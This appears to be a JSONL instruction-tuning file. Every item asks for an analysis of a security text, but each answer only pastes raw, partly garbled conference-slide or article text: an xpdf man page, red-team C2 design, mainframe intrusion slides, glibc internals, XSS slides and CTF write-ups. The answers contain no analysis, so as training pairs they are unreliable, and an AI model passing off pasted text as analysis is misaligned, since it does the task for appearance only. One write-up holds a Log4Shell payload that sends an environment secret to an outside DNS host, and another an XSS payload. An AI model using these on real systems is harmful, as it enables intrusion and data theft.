{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" Copyright 1996 Derek B. Noonburg .TH xpdf 1 \"02 Aug 1999\" .SH NAME xpdf \\-Portable Document Format(PDF)文件阅读器(版本0.90) .SH 总览 .B xpdf [选项] .RI [ PDF文件 .RI [ page]] .SH 描述 .B Xpdf是一个 Portable Document Format(PDF) 文件阅读软件.(PDF文件也经常被称为\"Acrobat\" 文件,这种叫法来源于Adobe公司的PDF软件的名字.) Xpdf运行在UNIX,VMS和OS/2的X Window系统下. .PP 运行xpdf,只要键入: .PP .RS xpdf file.pdf .RE .PP .I file.pdf 是你的PDF文件.文件名字后面可以跟随一个数字,用于指定最先显示的页面的页码,比如: .PP .RS xpdf file.pdf 18 .RE .PP 你当然也可以启动xpdf而不打开任何文件. .PP .RS xpdf .RE .SH 选项 方括弧中列出了X资源和相应的选项 .TP .B \\-err 将错误信息指定送到/dev/tty而不是标准错误中(此选项当xpdf被其它程序,比如netscape,打开时,十分有用,否则,每个错误都会弹出一个令人讨厌的小窗口). .TP .BI \\-z \" zoom\" 设定初始的放大因子.放大因子是(-5..5)之间的一个数字,其中0表示72dpi.你也可以通过\\`page`设定显示页面大小配合窗口大小,或者通过\\`width`设定显示页面宽度配合窗口宽度. .RB [ xpdf.initialZoom] .TP .BI \\-g \" geometry\" 设定窗口的初始几何参数. .RB (相当于 \\-geometry.) .RB [ xpdf.geometry] .TP .BI \\-remote \" name\"] 启动/连接名为name的xpdf远程服务器(参见后面的\"远程服务器模式\"部分) .TP .B \\-raise 建立xpdf远程服务器窗口.(仅适用于-remote时) .TP .B -\\quit 退出xpdf远程服务器.(仅适用于-remote时) .TP .B \\-cmap 安装一个自定义的色彩地图.此选项在TrueColor模式下无效. .RB [ xpdf.installCmap] .TP .BI \\-rgb \" number\" 设置xpdf将要分配的最大RGB值.缺省值是5(即RGB值5x5x5); 设置一个小数值,可以节省色彩表记录.在自定义色彩地图和TrueColor模式下,此选项无效. .TP .BI \\-papercolor \" color\" 设置\"页面色彩\",比如,页面的显示背景.当pdf文件出现类似在字符后填充白色等情况的时候,此选项无法正常工作. .RB [ xpdf.paperColor] .TP .B \\-eucjp 复制字符时,将日文字符转换成EUC-JP编码.这是至今为止唯一的日文字符转换选项---它的唯一作用就是将非日文字符转换成7-bit的ASCII,以便于配合EUC-JP编码.(此选项只有在编译pdftotext时加上日文支持才有效) .RB [ xpdf.eucjp ] .TP .BI \\-t1lib \" font-type\" 设定使用t1lib类型的字体提供器.选项为\\`none`(完全不使用t1lib),\\`plain`(使用non-anti-aliased字体),\\`low`或\\`high`(使用low-level或者high-level anti-aliased 字体). .RB [ xpdf.t1libControl] .TP .BI \\-ps \" PS-file\" 设定缺省的PostScript输出文件的名字.此选项也可以以\\`|command`的形式,通过某个命令来管道PostScript文件. .RB [ xpdf.psFile] .TP .BI \\-paperw \" size\" 设定页面宽度,单位是像素点. .RB [ xpdf.psPaperWidth] .TP .BI \\-paperh \" size\" 设定页面高度,单位是像素点. .RB [ xpdf.psPaperHeight] .TP .B \\-level1 产生Level1 PostScript文件.输出的PostScript文件相当的大(如果它包含图片的话),但是确可以在Level 1打印机上打印输出.此选项将所有的图像转换成黑白图像. .RB [ xpdf.psLevel1] .TP .B \\-cmd 打印出命令的执行结果(在调试时有用) .T", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n做红队你需要学习如何挖掘战壕一 0x00 前言 看到红队和战壕相信做红队或者蓝军的同学应该知道我想聊什么了今天和大家聊一聊红队的基础设 施 19年的时候为了准备一个PPT系统的梳理了下红队的基础设施现在写出来算是抄冷饭了希望对大 家依旧有用我曾经大言不惭的说过一句话在红队行动中完善的基础设施是成功的一半虽有夸 张却无不当在这儿做个形象的比喻搭建基础设施类似于打仗前挖的战壕战壕不仅是个人掩 体还是部队作战输送和补给的场地战壕置于战争的作用就是基础设施置于红队行动的作用对 军事有兴趣的同学可以百度如何挖掘战壕回归正题所谓的红队的基础设施具体的是什么下文中 红队的基础设施全部以基础设施代指 0x01 什么是基础设施 为什么要花这么大的力气去搭建所谓的基础设施什么是基础设施在解释这些问题之前你应该对什 么是挖漏洞什么是渗透测试什么是红队行动有一定了解在此我就不过多阐述了网上有很多 文章阐述我也没有更多新的见解在这儿用2个故事做个比喻简单解释下 故事1 领导丢该小明一个网站小明使用扫描器发现一个文件上传漏洞然后小明告诉领导目标有文件上传漏 洞 故事2 领导丢该小明一个网站小明使用扫描器发现一个文件上传漏洞然后上传webshell并提权再以此台 服务器为代理对内网进行各种扫描发现一堆弱口令sql注入文件上传等等漏洞最后告诉领导整 个流程 相信大家应该清晰了故事1是挖漏洞故事2是渗透测试那什么是红队行动呢 这是我19年的理解现在针对真实的APT攻击行为有了不同的一些认识请阅读做攻击者那些年的 一些想法 通过对挖漏洞渗透测试APT的对比发现APT具有隐蔽周期长俗话说不怕贼偷就怕贼惦 记长期盯着你不择手段针对性极强明确的目的性的特点这些是挖漏洞和渗透测试不具备 的 说到这里你联想一下应该就清楚什么是红队基础设施了从意义和作用上讲红队基础设施是为了满 足红队行动中隐蔽性周期性持久性针对性以及满足作战协同和后期出报告的需求而发展形成的 红队行动的一个阶段实际落地具象化就是C2搭建匿名网络链路相关的在此不谈后面单独行文 看到这儿你可能内心会想了MD BB了半天不就是搭建一个C2嘛是的就是搭建C2搭建C2容 易但是要搭建一个好的C2就不容易了 0x02 C2架构设计 这是普通的C2架构也是大家常用的说架构都有点不合适就是一个链路而已它有哪些缺陷呢 功能无分离 通道无分离无潜伏通道 没有前置机架构灵活性太低 TeamServer太少回连机器过多会导致CS日志同步极其耗时间 再看演进一个版本 这一下有了DNS通道HTTP通道HTTPS通道每种协议通道都有自己的优势劣势根据这些优势劣势 按需分配分别作为数据通道控制通道潜伏通道再根据红队行动中攻击方式的不同来做功能隔 离例如钓鱼的C2不要和后渗透的放一起不同的打点位用不同的链路 那么这个架构有什么劣势呢在行动中难免不触发报警因此为了不被完全清场同时还要做到功能分 离通道分离等这样会导致teamserver成几何级部署因此前置的作用尤为重要了 让我们看看最终版 这下有了前置了有钓鱼的前置植入体下载前置控制前置潜伏通道前置这里没有数据通道的前 置红队行动毕竟不是APT不需要拖取大量数据这是违法的 在这儿有几个小的tips结合实际多次经历在稳定性和成本上的考量 TeamServer推荐配置 1-2cpu 2G内存以上内存太小控制周期过长和操作太多会导致内存不够用容易down机 10G以上硬盘 每台TeamServer回连不超过5台 一台机器实际行动中往往有多个session存在满足不同的操作互不影响的需求 回连机器过多回连频率设置不恰当会导致teamServer被DDOS然后卡死 潜伏通道 根据实际目标环境DNS通道优先低频率低速度低数据 高隐蔽方式优先例如借用三方服务搭建的通道这种通道隐蔽性好但是效率低非常适 合潜伏通道 从架构图中可以看出基础的元素就是ip和域名vpsC2工具cobaltStrike前置器cdn类 反代类三方类漏洞类关于VPS的选择C2工具的对比不在本系列中描述后面单独行文做好 一个C2的搭建也就是选好这些元素 第一篇就到此结束了吧内容太多我自己都会不想读下一篇接着说ip和域名相关的选择 这个系列就叫如何挖掘战壕系列 架构设计和简述 IP和域名 C2工具CobaltStrike 前置器 自动化部署", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nRT2WIN! How 50 lines of Python made me the luckiest guy on Twitter No purchase necessary, enter as often as you want. So I am. Introduction  Im Hunter  Electrical & Computer Engineer  Working in Silicon Valley  Currently disrupting social local mobile big data analytics with cloud based MapReduce deployments on Docker with Rust Origin  Hey, theres a ton of contests on Twitter. All you have to do to enter them is retweet them xkcd.com How hard could it possibly be?  Step 1: Look for contests, retweet them  Step 2: Profit  Started with simple search terms at first  rt2win, rt to win, rt 2 win, retweet to win, etc  Used the Twitter API  Rate limit =  So, retweet slower, add random delays + Beautiful Soup Better solution  Turn the follow queue into a FIFO  Unfollow the 1st account when I follow the 2000th account  The amount of time it takes to enter 2000 contests that require following is enough that the 1st contest is almost certainly over by then  Side effect: I get more real followers because people follow back as a courtesy.  My bot actually looks more legit now Interesting interactions Forgot to change my name on one of my accounts that won the same contest as another one Yes, I won this. Bots vs Bots Someone offering a postcard signed by ME as a prize Sometimes my bot was accidentally a jerk Guess who? Another false positive Another false positive The Haul The full list: hscott.net/winnings.txt Doing good But even this backfired But even this backfired People ask you for weird stuff Stats  165,000 contests entered  On average, 4 wins per day, every day Stats  165,000 contests entered  On average, 4 wins per day, every day, for 9 months straight Stats  165,000 contests entered  On average, 4 wins per day, every day, for 9 months straight  Most valuable prize: $4000 trip to Fashion Week in NYC Yes, I paid the taxes. Other attempts  Before I did this, there were at most a few people auto-entering twitter contests  Couldnt find any obvious examples  Did see some manu", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nFrom ROOT to SPECIAL Hacking IBM Mainframes Soldier of Fortran @mainframed767 DISCLAIMER! All research was done under personal time. I am not here in the name of, or on behalf of, my employer. Therefore, any views expressed in this talk are my own and not those of my employer. This talk discusses work performed in my spare time generally screwing around with mainframes and thinking 'what if this still works...' @mainframed767 ?Question? PLAIN TXT 53% SSL 47% INTERNET MAINFRAMES ?SSL? Self Signed 33% No Error 49 SSL TN3270 MAINFRAMES Bad CA 17% Who are you?  Security Guy  Tired of 90s thinking  Eye opening experience @mainframed767 PCI Security Expert Mainframe Security Guru ISO 27002 & PCI Certifier Whats NETSTAT? - Our Horrible Consultant Spoken z/OS? WTF  Most popular mainframe OS  Version 2.1 out now! Legacy my ass! @mainframed767 z/OS Demo  Lets take a look at this thing  Itll all make sense @mainframed767 zOS or PoS?  Hard to tell, identifying sucks  Scanner have challenges nmap -sV -p 992 167.xxx.4.2 -Pn @mainframed767 Nmap 6.40 PORT: 992/tcp STATE: open SERVICE: ssl VERSION: IBM OS/390 @mainframed767 Nmap 6.46 PORT: 992/tcp STATE: open SERVICE: ssl VERSION: Microsoft IIS SSL @mainframed767 CENSORED( CENSORED( CENSORED( CENSORED( CENSORED( CENSORED( Other Methods  Web Servers: IBM HTTP Server V5R3M0 FTP Banner @mainframed767 CENSORED( Lets Break in  Steal Credentials  Web Server  3270 Panels  Usin BIRP @mainframed767 Ettercap Demo @mainframed767 Missed it @mainframed767 CGI-Bin in tyool 2014  REXX / SH still used  Injection simple, if you know TSO commands @mainframed767 @mainframed767 CENSORED( CENSORED( @mainframed767 B.I.R.P.  Big Iron Recon & Pwnage  By @singe  HITB 2014  3270 is awesome @mainframed767 Standard 3270 @mainframed767 BIRP 3270 @mainframed767 Only FTP?  No Problem!  FTP lets you run JCL (JCL = Script)  Command: SITE FILE=JES Access Granted  Now we have access  FTP Account  Asking someone Now what? @mainframed767 Escalate!  Lets escalate our pr", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 释放内存块 ## __libc_free 类似于 mallocfree 函数也有一层封装命名格式与 malloc 基本类似代码如下 ```c++ void __libc_free(void *mem) { mstate ar_ptr; mchunkptr p; /* chunk corresponding to mem */ // 判断是否有钩子函数 __free_hook void (*hook)(void *, const void *) = atomic_forced_read(__free_hook); if (__builtin_expect(hook != NULL, 0)) { (*hook)(mem, RETURN_ADDRESS(0)); return; } // free NULL没有作用 if (mem == 0) /* free(0) has no effect */ return; // 将mem转换为chunk状态 p = mem2chunk(mem); // 如果该块内存是mmap得到的 if (chunk_is_mmapped(p)) /* release mmapped memory. */ { /* See if the dynamic brk/mmap threshold needs adjusting. Dumped fake mmapped chunks do not affect the threshold. */ if (!mp_.no_dyn_threshold && chunksize_nomask(p) > mp_.mmap_threshold && chunksize_nomask(p) <= DEFAULT_MMAP_THRESHOLD_MAX && !DUMPED_MAIN_ARENA_CHUNK(p)) { mp_.mmap_threshold = chunksize(p); mp_.trim_threshold = 2 * mp_.mmap_threshold; LIBC_PROBE(memory_mallopt_free_dyn_thresholds, 2, mp_.mmap_threshold, mp_.trim_threshold); } munmap_chunk(p); return; } // 根据chunk获得分配区的指针 ar_ptr = arena_for_chunk(p); // 执行释放 _int_free(ar_ptr, p, 0); } ``` ## _int_free 函数初始时刻定义了一系列的变量并且得到了用户想要释放的 chunk 的大小 ```c++ static void _int_free(mstate av, mchunkptr p, int have_lock) { INTERNAL_SIZE_T size; /* its size */ mfastbinptr * fb; /* associated fastbin */ mchunkptr nextchunk; /* next contiguous chunk */ INTERNAL_SIZE_T nextsize; /* its size */ int nextinuse; /* true if nextchunk is used */ INTERNAL_SIZE_T prevsize; /* size of previous contiguous chunk */ mchunkptr bck; /* misc temp for linking */ mchunkptr fwd; /* misc temp for linking */ const char *errstr = NULL; int locked = 0; size = chunksize(p); ``` ### 简单的检查 ```c++ /* Little security check which won't hurt performance: the allocator never wrapps around at the end of the address space. Therefore we can exclude some size values which might appear here by accident or by \"design\" from some intruder. */ // 指针不能指向非法的地址, 必须小于等于-size为什么 // 指针必须得对齐2*SIZE_SZ 这个对齐得仔细想想 if (__builtin_expect((uintptr_t) p > (ui", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Log 4 Sanity I've overthought this task, but in the end what worked is just: ``` ${jndi:dns:kot.pl/${env:FLAG}} ``` In the error message (shown in the terminal! Ugh) we see: ``` 2021-12-19 16:52:52,357 main WARN Error looking up JNDI resource [dns:kot.pl/hxp{Phew, I am glad I code everything in PHP anyhow :) - :( :( :(}]. javax.naming.InvalidNameException: Label exceeds 63 octets: pl/hxp{ Phew, I am glad I code everything in PHP anyhow :) - :( :( :(}; remaining name '\"kot.pl/hxp{Phew, I am glad I code everything in PHP anyhow :) - :( :( :(}\"' ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHACKSTUFF @ OSCAR WEB前端攻擊與防禦 前言  不講FLASH  不講Moblie  WEB基礎 大綱  攻擊原理介紹  衍生攻擊  防禦方式  實際案例 我是誰  奧斯卡  PHP後端工程師  hackstuff member  oscar3x39@gmail.com 前端 什麼是前端  前端就是軟體中與用戶交互的部分  這裡軟體指的是瀏覽器 HTML + CSS + JS 前端攻擊  利用軟體中與用戶交互的弱點 進行非法操作 什麼是前端攻擊 攻擊點 瀏覽器 網站 使用者 WEB前端攻擊主要類型 XSS CSRF 操作挾持 XSS OWASP OPEN WEB APPLICATION SECURITY PROJECT TOP 10 A1 Injection A2 Broken Authentication and Session Management (was formerly 2010-A3) A3 Cross-Site Scripting (XSS) (was formerly 2010-A2) A4 Insecure Direct Object References A5 Security Misconfiguration (was formerly 2010-A6) A6 Sensitive Data Exposure (2010-A7 Insecure Cryptographic Storage and 2010-A9 Insufficient Transport Layer Protection were merged to form 2013-A6) A7 Missing Function Level Access Control (renamed/broadened from 2010-A8 Failure to Restrict URL Access) A8 Cross-Site Request Forgery (CSRF) (was formerly 2010-A5) A9 Using Components with Known Vulnerabilities (new but was part of 2010-A6  Security Misconfiguration) A10 Unvalidated Redirects and Forwards GOOGLE VULNERABILITY REWARD 什麼是XSS 不就 ALERT(XSS) 什麼是XSS 跨網站指令碼Cross-site scripting 通常簡稱為XSS或跨站指令碼或跨站指令碼攻 擊 避免跟CSS搞混所以簡稱XSS XSS攻擊是攻擊者注入惡意代碼到網頁用戶 載入並執行惡意代碼後的過程 XSS怎麼發生 /x.php?a=abc&b=123 hello, abc123 /x.php?a=<svg/onload=&b=alert(1)> 什麼是CSRF  跨站請求偽造英語Cross-site request forgery也被稱為 one-click attack 或者 session riding通常縮寫為 CSRF 或者 XSRF  是一種挾制用戶在當前已登錄的Web應用程式上 執行非本意的操作的攻擊方法  XSS 利用的是用戶對指定網站的信任CSRF 利 用的是網站對用戶網頁瀏覽器的信任 CSRF怎麼發生 CSRF怎麼防禦 HTTP ONLY (Apache httpOnly Cookie Disclosure) TOKEN Referer 什麼是操作挾持  對某些操作進行狹持讓使用者產生非預期結果 ClickJacking Drag & Drop ClickJacking TabJacking RFD (Reflected File Download Attack) XPS 等 CLICKJACKING DROPJACKING TABJACKING  https://www.youtube.com/watch?v=4fY8GIi2sl4 JS + CSS RFD (REFLECTED FILE DOWNLOAD ATTACK) 利用server返回未知content-type 使browser產生下載  http://drops.wooyun.org/papers/3771 XPS (COPY PASTE) copy & pest cross application XSS  http://www.slideshare.net/x00mario/copypest 前端攻擊 PHISHING рhp.net php.net KEY LOGGER XSS BLIND  WebRTC => get lan IP  p", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n漏洞响应的六思 如何在归档漏洞 如何运营漏洞 如何跟踪漏洞 如何在洞海茫茫中搜集漏洞 如何在漏洞中识别水洞 如何在漏洞响应阶段处理漏洞 61.42% 共收录1209个漏洞其中 高可利用性漏洞238个 非高可利用的高危漏洞267个 影响一般的中危漏洞742个 影响很小的低危漏洞66个 影响一般的中危漏洞 10.97% 22.12% 5.49% 影响很小的低危漏洞 非高可利用的高危漏洞 高可利用性漏洞 标准化的重要性 漏洞搜集 漏洞响应 漏洞运营 漏洞定级分发 漏洞跟踪 漏洞归档 自动化收集 + 人工筛选 = 录入平台 定级金字塔模型 + 漏洞专家培养方案 响应流程标准化 漏洞预警+漏洞复现+漏洞检测+漏洞防御 跟踪流程标准化 补丁+用户+变形+原理+影响 运营流程标准化 效果 + 市场 归档流程标准化 分析报告+标准化漏洞格式 如何在洞海茫茫中搜集漏洞 Hacker's5Blog Hacker5Conference InfoSec5News Vulnerabilities/Exploits Security5Teams Security5Community 洞 Exploit-DB PacketStorm-Exploits SecurityFocus Bugtraq Full5Disclosure Seebug漏洞社区 SCAP中文社区 ..... Google5Security 小黑屋 Web5Security5Blog5 Acunetix 安全弱点实验室 FireEye5Threat5Research5Blog 勾陈安全实验室 腾讯科恩实验室官方博客 seebug's5paper HackerOne ..... DEFCON 窝 离别歌-phith0n ADog's5Blog bsmali4的小窝 安全工搬砖笔记 独自等待-信息安全博客 sky's自留地 暗月|博客 0xCC ..... 先知安全技术社区,5吾爱破解,55i春秋社区,55看雪论坛, T00LS,5BlackHat,5漏洞时代,5SRC,5知识星球 ,5... FreeBuf RoarTalk MottoIN 91Ri.org,5SecWiki5News, 安全脉搏,5安全盒子,5... 如何在漏洞中识别水洞 公司预警 一级 千里目预警 三级 安全云预警 二级 平台收录 四级 漏洞危害程度 目标使用范围 攻击细节泄露 如何在漏洞响应阶段处理漏洞 IPS规则库 WAF规则库 漏洞防御 超融合架构 云端镜像仓库 漏洞复现 前言 千里百科 漏洞描述 漏洞复现 影响版本 修复建议 参考链接 深信服解决方案 漏洞预警 云眼平台插件 云镜平台插件 漏洞检测 插件标准化 插件在线编写 +5下发测试 +5部署上线 规则库标准化 规则在线编写 +5下发测试 +5部署上线 预警标准化模板 根据级别推送到不同接口人 Docker模板 云+端的漏洞靶场部署 如何跟踪漏洞 影响跟踪 原理跟踪 变形跟踪 用户跟踪 补丁跟踪 统计影响分布 漏洞原理分析文章 绕过补丁方案 收集变形攻击脚 本其他检测方 案更新云眼 平台插件 收集变形绕过数 据包更新AF库 受影响客户推送 跟踪漏洞补丁 如何运营漏洞 1 跟踪变形攻击 收集变形攻击脚本其他检测 方案 分析漏洞原理找出绕过补丁方 案 2 调整规则和插件的准确性 收集变形绕过数据包更新AF 库 更新云眼平台插件 3 深入影响跟踪 设备+云平台联动形成大数据 平台统计漏洞影响分布 如何归档漏洞 漏洞复盘 漏洞归档文件 漏洞报告 预警 +\"\"分析 +\"\"\"数据 =\"\"\"报告 漏洞详细分析文档 漏洞环境操作文档 04 03 02 01 基于漏洞闭环的跟踪平台 后端 Flask 2012 前端 AngularJS+Bootstrap 2013 消息队列 RabbitMQ 2014 部署方式 wsgi+Supervisor+gunicorn+nginx 2015 漏洞闭环平台 漏洞库 规则库 插件库 镜像仓库 基于漏洞闭环的跟踪平台 流程图 LOREM 漏洞搜集 2012 LOREM 漏洞响应 2013 LOREM 漏洞跟踪 2014 LOREM 漏洞运营 2015 LOREM 漏洞归档 2016 基于漏洞闭环的跟踪平台基功能架构 漏洞闭环的跟踪平台->漏洞库 漏洞重要等级 爆发时间 CVE编号 SF编号 漏洞名称 CNVD Bugtraq编号 分析人 类型 链接 状态 备注 微软漏洞编号 漏洞大类 漏洞对象 漏洞小类 漏洞描述 漏洞影响版本 漏洞解决方案 漏洞参考链接 漏洞详细分析 环境操作文档 插件编号 规则编号 Q&A", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nI Know What You Are By the Smell of Your Wi-Fi Denton Gentry @dgentry denny@geekhold.com Were here today to talk about a mechanism which identifies the type of device connecting to a Wi-Fi network. It can be quite specific: it can tell the difference between an iPhone 5 and an iPhone 5s, between a Samsung Galaxy S7 and an S8, between a Withings scale and a Nest Thermostat. Classically, this kind of client detection would be called fingerprinting like the OS fingerprinting mechanisms in nmap. However, in current usage the term fingerprinting has evolved to mean identification of specific users, such as browser fingerprinting to identify an individual person. Also, well, the word fingerprint kindof means an individuals fingers. As the mechanism discussed here identifies the species of the device, not the unique individual, we refer to it as Wi-Fi Taxonomy. It identifies a species. Well get a chance to try it in the last few minutes, during some time for questions. 0:50 MAC Sublayer Management Entity (MLME) Probe Request: Asks nearby APs to respond. Association Request: join the Wi-Fi network Probe Request Association Request Probe Response Association Response The mechanism works by examining Wi-Fi Management frames, called MLME frames. These frames are used to join, leave, and configure the Wi-Fi network. They are not TCP/IP packets, they are not routable and they do not leave the Wi-Fi network. Well focus on two specific frames: 1. Probe Request, where a client can ask all nearby Access Points or one specific AP to respond. The client includes information about itself and its capabilities in the request, and the AP can respond with its own capabilities in the response. 2. Well also look at the Association Request, when a client joins a Wi-Fi network. The client includes many of the same capabilities as in the Probe Request, plus a few more. There are a bunch of other types of MLME frames, like the Authentication frame or Action frames to adjust various parameters, b", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCopyright 2003 - SunStorm Security Group Slide Number 1 of 64 After Napster Assessing the Threats, Value and Survivability of Peer-to-Peer Networks Copyright 2003 - SunStorm Security Group Slide Number 2 of 64 Napster: The File Sharing Invasion Copyright 2003 - SunStorm Security Group Slide Number 3 of 64 Napster Overview  Facts and figures about Napster  What happened to Napster? Copyright 2003 - SunStorm Security Group Slide Number 4 of 64 Napster Subscription Base Can 98 Million Users All be Wrong? The Numbers Game   18,000,000 people have broadband at home now (IBID)   34% of U.S. population regularly streams music today (Arbitron/Edison Media)   Napster enlisted more users in 1 year than AOL did in 15 years. (Arbitron/Edison Media)   34% of U.S. population regularly streams music today (Arbitron/Edison Media)   40% of U.S. population will be listening to Internet radio by 2003 (Webnoize)   Digital downloads will grow from 3% of online music sales in 2001 to 30% in 2006 (Jupiter Media Metrix) Copyright 2003 - SunStorm Security Group Slide Number 5 of 64 Napster Subscription Base Can 98 Million Users All be Wrong? The Napster Server Architecture Napster enlisted and served more users in 1 year than AOL did in 15 years. (Arbitron/Edison Media) 118 servers served the entire globe. Copyright 2003 - SunStorm Security Group Slide Number 6 of 64 From Doom to Tombs to Tunes Online Gaming and MMOG to Music  In the beginning there were games  The global demand for music  Economic forces  The recording industry  RIAA and other interested parties  DMCA and copyright law Copyright 2003 - SunStorm Security Group Slide Number 7 of 64 Its the Primal App, Stupid  Napster as a Killer App  Why some peer-to-peer systems fail  How will peer-to-peer survive the attacks on filesharing and privacy? Copyright 2003 - SunStorm Security Group Slide Number 8 of 64 Building Secure and Successful Peer-to-Peer Systems  If I build it, will they come?  If they come, will I be able to handle them", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nKCon KCon 探索虚拟化技术在漏洞检测中的应用 By:仙果 PART 01 自我介绍 PART 02 困境的城内和城外 PART 03 VT VS Exploit PART 04 攻防技术对抗 PART 05 结语 目录 CONTENTS 自我介绍 01 高级安全工程师 仙果 安全研究员 准爸爸 我 是 谁  看雪学院 02 困境的城内和城外 困境 针对性的检测漏洞攻击 时间和效率的考量 人工分析的难度较大 人才培养周期长 攻防对抗成本显著增加 虚拟化技术应用于漏洞攻防对抗 精确对抗漏洞攻击 节省人力成本 虚拟化Virtualization 更多的时间在技术研究上 Virtualzation Hardware Enabled Virtualzation 隐藏了系统应用程序员和终 端用户赖以交互的计算机资源 物理性的一面把单一物理资 源转换为多个逻辑资源反之 亦可 硬件层面上CPU对虚拟化技术提 供直接支持提高虚拟效率降低 开发难度硬件上实现内存地址甚 至是I/O设备的映射支持二次寻 址 VM_0 VM_1 VM_2  客户机 客户机 客户机 总线控制器 物理 I/O 设 备 页表 访问 I/O 设 备 CPU Hypervisor 物理设备层 HEV/Hypervisor 操作系统 应用程序 操作系统 应用程序 操作系统 应用程序 虚拟机-1 虚拟机-2 虚拟机-3 Intel VT AMD SVM 为每个虚拟机提供虚拟处理器 VMM层可以控制处理器资源物理内存管理中 断和I/O操作 各虚拟机采用相同接口处理虚拟机设备 每个虚拟机可以独立运行相互独立 VMM层对虚拟机完全透明 客户机模式 Hypervisor 与Guest 直接快速切换 中断Guest 中特定的指令或事件 DMA保护 虚拟中断 嵌套页实现地址翻译 TLB(Translation Lookaside Buffer)减少性能下降 Intel VT---EPT intel CPU在处理器级别加入对内存虚拟化的支持支持 两级地址翻译 一个逻辑CPU处于非根模式下运行客户机代码时使用 的地址是客户机虚拟地址而访问这个虚拟地址时同 样会发生地址的转换这里的转换还没有设计到VMM 层和正常的系统一样依然是采用CR3作为基址利 用客户机页表进行地址转换只是到这里虽然已经转换 成物理地址是客户机物理地址不等同于宿主机的物 理地址所以并不能直接访问需要借助于第二次的转 换也就是EPT的转换 真实物理地址 虚拟物理地址 虚拟线性地址 gPT CR3 EPTP gPT EPT VT VS Exploit 03 硬件各个单元合并虚拟之后使 用KVM 硬件虚拟化框架进行 硬件单元的管理和调度 KVM使用 Intel VT 技术来提升 虚拟化处理性能在 KVM 上层 通过嵌套的 nested VT技术使 检测框架运行在 QEMU 虚拟机 中 利用VT技术从而实现传统技术 无 法 实 现 的 技 术  例 如 MSR HOOKEPT hook特权指令 监控等 VT 检测框架 计算单元 硬件设备层 Hypervisor VT KVM+QEMU Guest OS 应用程序 A VT Win7 应用程序 B VT XP 应用程序 C VT Win10 存储单元 显示单元 指令追踪通过在 HOST 层针对 CPU指令注入MTF陷阱当 CPU 汇编指令执行完毕后触 发 VM Exit 事件陷入 HOST 处理流程中 进而能够记录具体的指令流程和 当前CPU的运行环境从而能够 进行命中规则的指令流记录 当记录完成之后就可以进行规 则上的匹配规则匹配完整之后 通过 VMResume 指令产生 VM Entry 事件交回到 Guest进行执 行下一条指令 依次进行循环处理 指令追踪流程图 MOV$DWORD$PTR[REG],REG ADD$REG,XXXX MOV$REG,RET SUB$REG,XXX CALL$DWORD$PTR[REG] 注入$MFT$陷阱 启动追踪 记录指令 VM$Entry 规则匹配 CPU VM$Exit Guest Host 指令追踪 VS ROP 返回地址 栈帧 TEB PEB Module + 返回地址 栈帧 TEB PEB Module + 规则匹配流程 Reg+In+Moudle++ Reg+Target+In+moudle Source+ 指令追踪通过在 HOST 层针对 CPU指令注入MTF陷阱当 CPU 汇编指令执行完毕后触 发 VM Exit 事件陷入 HOST 处理流程中 进而能够记录具体的指令流程 和当前CPU的运行环境从而 能够进行命中规则的指令流记 录 当记录完成之后就可以进行 规则上的匹配规则匹配完整 之后通过 VMResume 指令 产生 V", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Multiplicater (web, 457p, 10 solved) In the challenge we get access to a [cgi script](index.cgi). The script is not very complex: - It sets the variables var1 and var2 to be integer (yes, bash can have types variables!) - It reads POST parameters we send via HTTP form, splits them with `awk` to extract the values - Then it decodes urlencode - Then it filters all letters from the input - Finally it performs `bash arithmetic evaluation` of `var1 * var2` ```bash typeset -i var1 typeset -i var2 POST_STRING=$(cat) var1=\"$(echo $POST_STRING|awk -F'&' '{print $1}'|awk -F'=' '{print $2}'| nkf -w --url-input|tr -d a-zA-Z)\" var2=\"$(echo $POST_STRING|awk -F'&' '{print $2}'|awk -F'=' '{print $2}'| nkf -w --url-input|tr -d a-zA-Z)\" echo \"$var1\" '*' \"$var2 = $((var1 * var2))\" ``` We don't know where the flag is, so we need an actual RCE here. First issue here is that `tr -d a-zA-Z` removes all letters, so any payload we send has to be free of those. This is not terrible if we can evaluate things like `$'\\101'` in bash, because they will be interpolated to letters. Another issue is that `var1` and `var2` upon assignment will be evaluated and casted to int. Anything that is not a valid int will result in `0`. This means that we can't really \"leak\" much with the last echo, because it will `always` result in integer, and it's inputs will always be integers. This leaves us with not much space at all, we somehow need to gain RCE with `var1=\"$(echo SOMETHING)\"` This assignment, since the variable is typed, performs `arithmetic evaluation` before the assignment. If we read the documentation, it `claims` thar such evaluation does perform shell expansion and variable substitution, however if we try to send a simple sanity check like `$$` as variable value, it doesn't actually work. It took us a while, and actually someone reading through bash source code of the evaluation, to find out that there is a very special case for `evaluating array index` which is far more powerful! I fact it pro", "category": "text_analysis", "source": "security_papers"}
